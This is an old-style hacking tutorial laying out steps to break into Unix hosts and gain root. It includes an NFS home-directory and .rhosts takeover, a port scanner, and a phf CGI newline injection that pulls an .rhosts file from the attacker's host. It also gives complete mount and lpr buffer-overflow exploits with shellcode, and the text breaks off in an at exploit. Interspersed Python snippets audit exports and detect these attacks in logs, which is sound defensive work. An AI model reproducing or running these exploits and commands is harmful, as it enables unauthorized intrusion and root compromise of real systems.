User's guide
__________________________
Well, howdy folks... I guess you are all wondering who's this guy (me) that's trying to show you a bit of everything...?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...
______________________
If you feel offended by this subject (hacking) or you think that you could do better, don't read the below information...
This file is for educational purposes ONLY... ;)
I ain't responsible for any damage you cause after reading this... (I'm very serious...)
So this can be copied, but not modified (send me the changes, and if they are good, I'll include them).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press <PgDown>.
Intro: Hacking step by step.
_________________________________________________________________________________
Well, this ain't exactly for beginners, but it'll have to do.
What all hackers have to know is that there are 4 steps in hacking...

Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactly what I meant.
Step 1: Getting access.
_______
Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

    mysite:~>/usr/sbin/showmount -e victim.site.com
    RPC: Program not registered.

If it gives a message like this one, then it's time to search for another way in.
What I was trying to do was to exploit an old security problem in most SunOS versions that could allow a remote attacker to add a .rhosts to a user's home directory... (That was possible if the site had exported their home directory over NFS.)
Let's see what happens...
    mysite:~>/usr/sbin/showmount -e victim1.site.com
    /usr                 victim2.site.com
    /home                (everyone)
    /cdrom               (everyone)
    mysite:~>mkdir /tmp/mount
    mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
    mysite:~>ls -sal /tmp/mount
    total 9
       1 drwxrwxr-x  8 root   root  1024 Jul  4 20:34 ./
       1 drwxr-xr-x 19 root   root  1024 Oct  8 13:42 ../
       1 drwxr-xr-x  3 at1    users 1024 Jun 22 19:18 at1/
       1 dr-xr-xr-x  8 ftp    wheel 1024 Jul 12 14:20 ftp/
       1 drwxrx-r-x  3 john   100   1024 Jul  6 13:42 john/
       1 drwxrx-r-x  3 139    100   1024 Sep 15 12:24 paul/
       1 -rw-------  1 root   root   242 Mar  9  1997 sudoers
       1 drwx------  3 test   100   1024 Oct  8 21:05 test/
       1 drwx------ 15 102    100   1024 Oct 20 18:57 rapper/
Well, we wanna hack into rapper's home.

    mysite:~>id
    uid=0 euid=0
    mysite:~>whoami
    root
    mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might forget it on the remote server...

    mysite:~>su - rapper
    Welcome to rapper's user.
    mysite:~>ls -lsa /tmp/mount/
    total 9
       1 drwxrwxr-x  8 root   root   1024 Jul  4 20:34 ./
       1 drwxr-xr-x 19 root   root   1024 Oct  8 13:42 ../
       1 drwxr-xr-x  3 at1    users  1024 Jun 22 19:18 at1/
       1 dr-xr-xr-x  8 ftp    wheel  1024 Jul 12 14:20 ftp/
       1 drwxrx-r-x  3 john   100    1024 Jul  6 13:42 john/
       1 drwxrx-r-x  3 139    100    1024 Sep 15 12:24 paul/
       1 -rw-------  1 root   root    242 Mar  9  1997 sudoers
       1 drwx------  3 test   100    1024 Oct  8 21:05 test/
       1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/
So we own this guy's home directory...

    mysite:~>echo "+ +" > rapper/.rhosts
    mysite:~>cd /
    mysite:~>rlogin victim1.site.com
    Welcome to Victim.Site.Com.
    SunOs ver....(crap).
    victim1:~$

This is the first method...
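The trick above needs two things to line up: a home directory exported to everyone, and a .rhosts that trusts any host. An added example (not from the original file) that checks both from the defender's side; the showmount output and the .rhosts contents are constructed to mirror the listing above.

```python
# Added example (not from the original text): audit the two conditions the
# NFS/.rhosts trick above depends on. All input below is constructed sample text.

# Constructed to mirror the showmount -e output shown in the text.
SHOWMOUNT_OUTPUT = """\
/usr    victim2.site.com
/home   (everyone)
/cdrom  (everyone)
"""

# Constructed .rhosts contents; a "+" in either column means "any".
RHOSTS_SAMPLE = """\
# trusted workstation
ws1.site.com   rapper
+ +
+ rapper
"""

def open_exports(showmount_text):
    """Export paths that showmount reports as open to (everyone) or '*'."""
    found = []
    for line in showmount_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith("/"):
            if "(everyone)" in parts[1:] or "*" in parts[1:]:
                found.append(parts[0])
    return found

def rhosts_wildcards(rhosts_text):
    """(host, user) pairs from a .rhosts that trust any host or any user.
    A line is 'host' or 'host user'; '+' in either position is a wildcard."""
    risky = []
    for line in rhosts_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host, user = fields[0], (fields[1] if len(fields) > 1 else None)
        if host == "+" or user == "+":
            risky.append((host, user))
    return risky

def audit(showmount_text, rhosts_text):
    """Both checks together: an open home export plus a wildcard .rhosts."""
    exports = open_exports(showmount_text)
    return {
        "open_exports": exports,
        "home_open": any(p == "/home" or p.startswith("/home/") for p in exports),
        "rhosts_wildcards": rhosts_wildcards(rhosts_text),
    }
```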
Another method could be to see if the site has an open port 80. That would mean that the site has a web page. (And that's very bad, 'cuz it usually is vulnerable.)
Below I include the source of a scanner that helped me when NMAP wasn't written. (Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor.)
NMAP is a scanner that does even stealth scanning, so lots of systems won't record it.
/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */
#include <stdio.h>
#include <stdlib.h>      /* exit */
#include <string.h>      /* memset, memcpy, strerror */
#include <ctype.h>       /* isdigit */
#include <unistd.h>      /* close */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */
#include <errno.h>
#include <netdb.h>
#include <signal.h>

int main(int argc, char **argv)
{
    struct hostent *host;
    int err, i, net;
    struct sockaddr_in sa;

    if (argc != 2) {
        printf("Usage: %s hostname\n", argv[0]);
        exit(1);
    }
    /* One full connect() per port, 1..1023, in order: each attempt is a
       complete TCP handshake, which is why the target can log it. */
    for (i = 1; i < 1024; i++) {
        memset(&sa, 0, sizeof sa);
        sa.sin_family = AF_INET;
        if (isdigit(*argv[1]))
            sa.sin_addr.s_addr = inet_addr(argv[1]);
        else if ((host = gethostbyname(argv[1])) != 0)
            /* memcpy, not strncpy: an address may contain zero bytes */
            memcpy(&sa.sin_addr, host->h_addr, sizeof sa.sin_addr);
        else {
            herror(argv[1]);
            exit(2);
        }
        sa.sin_port = htons(i);
        net = socket(AF_INET, SOCK_STREAM, 0);
        if (net < 0) {
            perror("\nsocket");
            exit(2);
        }
        err = connect(net, (struct sockaddr *) &sa, sizeof sa);
        if (err < 0) {
            printf("%s %-5d %s\r", argv[1], i, strerror(errno));
            fflush(stdout);
        } else {
            printf("%s %-5d accepted.\n", argv[1], i);
            if (shutdown(net, 2) < 0) {
                perror("\nshutdown");
                exit(2);
            }
        }
        close(net);
    }
    printf("\r");
    fflush(stdout);
    return (0);
}
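tcpprobe.c makes one full connect() per port, in order, so it shows up in the target's logs as a tidy sequence. An added example (not part of the original) that picks that pattern out of firewall logs; the iptables-style lines are constructed, and the SRC=/DPT= field names are the only thing the parser relies on.

```python
# Added example (not from the original text): flag the footprint tcpprobe.c
# leaves, one full TCP connect to every port in order from a single source.
import re
from collections import defaultdict

LINE_RE = re.compile(r"SRC=(?P<src>\S+) .*?DPT=(?P<dpt>\d+)")

def build_sample_log():
    """Constructed iptables-style lines (not real captures): a sequential
    sweep from 10.0.0.5 over ports 1-40 plus ordinary traffic from 10.0.0.7."""
    tmpl = ("Sep 15 12:24:{:02d} victim1 kernel: IN=eth0 SRC={} DST=10.0.0.9 "
            "PROTO=TCP DPT={} SYN")
    lines = [tmpl.format(i % 60, "10.0.0.5", i) for i in range(1, 41)]
    lines += [tmpl.format(5, "10.0.0.7", 80), tmpl.format(9, "10.0.0.7", 443)]
    return lines

def ports_by_source(lines):
    """Destination ports seen per source, in arrival order."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            seen[m.group("src")].append(int(m.group("dpt")))
    return seen

def longest_sequential_run(ports):
    """Longest run of consecutive ports in arrival order. A connect()-per-port
    loop yields 1,2,3,...; a randomised scanner does not."""
    best = run = 1 if ports else 0
    for prev, cur in zip(ports, ports[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best

def detect_sweeps(lines, min_ports=20, min_run=10):
    """{src: (distinct_ports, longest_run)} for sources that look like a sweep,
    either by breadth (many distinct ports) or by the in-order signature."""
    hits = {}
    for src, ports in ports_by_source(lines).items():
        distinct, run = len(set(ports)), longest_sequential_run(ports)
        if distinct >= min_ports or run >= min_run:
            hits[src] = (distinct, run)
    return hits
```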
Well, now be very careful with the below exploits, because they usually get logged.
Besides, if you really wanna get a source file from /cgi-bin/, use this syntax:

    lynx http://www.victim1.com//cgi-bin/finger

If you don't wanna do that, then do a:

    mysite:~>echo "+ +" > /tmp/rhosts
    mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+/root/.rhosts" | nc -v - 20 victim1.site.com 80

then

    mysite:~>rlogin -l root victim1.site.com
    Welcome to Victim1.Site.Com.
    victim1:~#
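The phf request above works by smuggling a newline (%0a) into the Qalias value, and the source-file trick relies on a doubled slash in front of /cgi-bin/. An added example (not from the original) that flags both in Common Log Format access logs; the log lines are constructed.

```python
# Added example (not from the original text): pick the phf newline injection
# and the //cgi-bin/ doubled-slash request out of web access logs.
import re
from urllib.parse import unquote

# Constructed Common Log Format lines; the third mirrors the request in the text.
ACCESS_LOG = [
    '10.0.0.7 - - [15/Sep/1997:12:24:01 -0500] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.7 - - [15/Sep/1997:12:24:05 -0500] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512',
    '10.0.0.5 - - [15/Sep/1997:12:25:10 -0500] "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+/root/.rhosts HTTP/1.0" 200 0',
    '10.0.0.5 - - [15/Sep/1997:12:25:30 -0500] "GET //cgi-bin/finger HTTP/1.0" 200 2210',
]

REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')

def classify(line):
    """None for benign lines, otherwise (severity, reason). phf handed the
    Qalias value to a shell, so a decoded newline or shell metacharacter in
    the query is the injection signature; '//cgi-bin/' is the source-fetch trick."""
    m = REQ_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if path.startswith("//") and "/cgi-bin/" in path:
        return ("medium", "doubled slash before /cgi-bin/")
    if not path.endswith("/cgi-bin/phf"):
        return None
    decoded = unquote(query.replace("+", " "))
    if "\n" in decoded or "\r" in decoded:
        return ("high", "newline injected into phf query")
    if re.search(r"[;|`$]", decoded):
        return ("high", "shell metacharacter in phf query")
    return ("info", "phf request")

def scan(lines):
    """[(client_ip, severity, reason, request_target)] for every flagged line."""
    out = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            m = REQ_RE.match(line)
            out.append((m.group("ip"), verdict[0], verdict[1], m.group("target")))
    return out
```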
Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...
Or if the site is really old, use that old (quote site exec) bug for wu.ftpd.
There are a lot of other exploits, like the remote exploits (innd, imap2, pop3, etc...) that you can find at rootshell.connectnet.com or at dhp.com/~fyodor.
Enough about this topic. (Besides, if you can finger the site, you can figure out usernames, and maybe by guessing passwords (sigh!) you could get access to the site.)
Step 2: Hacking r00t.
______
First you have to find the system it's running...

a). LINUX

ALL versions:
A big bug for all Linux versions is mount/umount and (maybe) lpr.
/* Mount Exploit for Linux, Jul 30 1996
   [ASCII-art banner omitted]
   Discovered and Coded by Bloodmask & Vio
   Covin Security 1996 */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, strlen */
#include <fcntl.h>
#include <sys/types.h>   /* u_long, u_char, u_int */
#include <sys/stat.h>

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int i;
    int ofs = DEFAULT_OFFSET;

    buff = malloc(4096);
    if (!buff)
    {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;
    /* fill start of buffer with nops */
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);
    /* stick asm code into the buffer */
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
    addr_ptr = (long *)ptr;
    for (i = 0; i < (8 / 4); i++)
        *(addr_ptr++) = get_esp() + ofs;
    ptr = (char *)addr_ptr;
    *ptr = 0;
    (void)alarm((u_int)0);
    printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
    execl(PATH_MOUNT, "mount", buff, NULL);
}
/* LPR exploit: I don't know the author... */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, strlen */
#include <unistd.h>
#include <sys/types.h>   /* u_char */

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023

long get_esp(void)
{
    __asm__("movl %esp,%eax\n");
}

int main(void)
{
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
                         "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
                         "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
                         "\xd7\xff\xff\xff/bin/sh";
    int i;

    buff = malloc(4096);
    if (!buff)
    {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;
    /* fill start of buffer with nops */
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);
    /* stick asm code into the buffer */
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
    addr_ptr = (long *)ptr;
    for (i = 0; i < 2; i++)
        *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
    ptr = (char *)addr_ptr;
    *ptr = 0;
    execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
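Both overflows above only matter because mount and lpr run setuid root. An added example (not from the original) that inventories setuid files under a path and reports any that are not on an expected list; the EXPECTED set and the demo tree are constructed assumptions, not taken from any real system.

```python
# Added example (not from the original text): inventory setuid files, the
# precondition the mount and lpr overflows above need in order to yield root.
import os
import stat
import tempfile

# Assumed baseline of setuid program names an admin expects on this box;
# anything else found is reported. Adjust to the real system.
EXPECTED = {"su", "passwd", "mount", "umount", "lpr"}

def find_setuid(root):
    """Regular files under root with the setuid bit set (sorted paths).
    Symlinks are not followed, so the bit is read off the file itself."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(p)
    return sorted(hits)

def unexpected_setuid(paths, expected=EXPECTED):
    """Setuid files whose basename is not on the expected list. Names that are
    expected (mount, lpr) still need a version check, which this does not do."""
    return [p for p in paths if os.path.basename(p) not in expected]

def demo():
    """Constructed tree in a temp dir: an expected setuid file, an unexpected
    one and a plain file. Returns (all_setuid, unexpected) as basenames."""
    with tempfile.TemporaryDirectory() as d:
        for name, mode in (("mount", 0o4755), ("unknown_tool", 0o4755),
                           ("notes.txt", 0o644)):
            p = os.path.join(d, name)
            with open(p, "w") as f:
                f.write("x")
            os.chmod(p, mode)
        found = find_setuid(d)
        return ([os.path.basename(p) for p in found],
                [os.path.basename(p) for p in unexpected_setuid(found)])

if __name__ == "__main__":
    print(demo())
```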
b.) Versions 1.2.* to 1.3.2

NLSPATH env. variable exploit:

/* It's really annoying for users and good for me...
   AT exploit gives only uid=0 and euid=your_usual_euid. */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024
#d